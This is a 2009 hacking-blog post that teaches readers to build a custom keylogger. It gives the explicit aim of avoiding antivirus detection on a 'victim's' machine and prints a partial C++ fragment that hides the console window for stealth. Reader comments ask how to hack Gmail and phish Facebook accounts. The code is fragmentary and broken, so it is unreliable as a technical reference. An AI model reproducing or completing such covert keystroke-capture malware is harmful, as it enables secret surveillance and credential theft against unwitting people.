Thursday, October 15, 2009
So till now, we only concentrated on hacking using tricks, social engineering, existing tools and other things.. So, now its time we start learning how to create our own, because by the time we start using this tools, they are already released in public and hence is identified by most of the anti-virus software, making your job harder.. So if you create one for yourself and not intend to release it in public.. You can use it without worrying about anti-virus software installed at victim's side..
To start with we will create a basic key-logger.. You already know by now, it is a basic component for a trojan, RATs, and almost every hacking software uses this feature.. Its available in many flavors or we can call it enhancement.. like invisible to user, invisible in task bar, stealth mode, autostart, mailing function, etc, etc.. today we will learn only the basic that is how it records the keystrokes..??
A keylogger listens to every keystrokes and records it for us.. There exists three way to implement keyloggers(that i know about..). They are:
1. GetAsyncKeyState
2. GetKeyboardState
/* THIS CODE WAS Published By Pratik Mishra.. Using help from the net and other programmers..
I hope you enjoyed the post.. Do Comment..
typedef HWND (WINAPI *tGetConsoleWindow)(void);
HINSTANCE handle = ::LoadLibrary("Kernel32.dll");
if ( handle )
pGetConsoleWindow = (tGetConsoleWindow)::GetProcAddress(handle, "GetConsoleWindow");
if ( pGetConsoleWindow )
{
HWND hwnd = pGetConsoleWindow();
::ShowWindow(hwnd,SW_HIDE);
}
if ( handle )
::FreeLibrary(handle);
Hack Gmail
Labels: Coding, keylogger, Source Codes
The system cannot find the file specified
Any ideas? (email : mikea.1192-at-gmail[dot]com)
Thanks
please how can i hack facebook using phishing? and how do i input the email on the script to recieve information from the client?
Thanks,
hardey_79@yahoo.com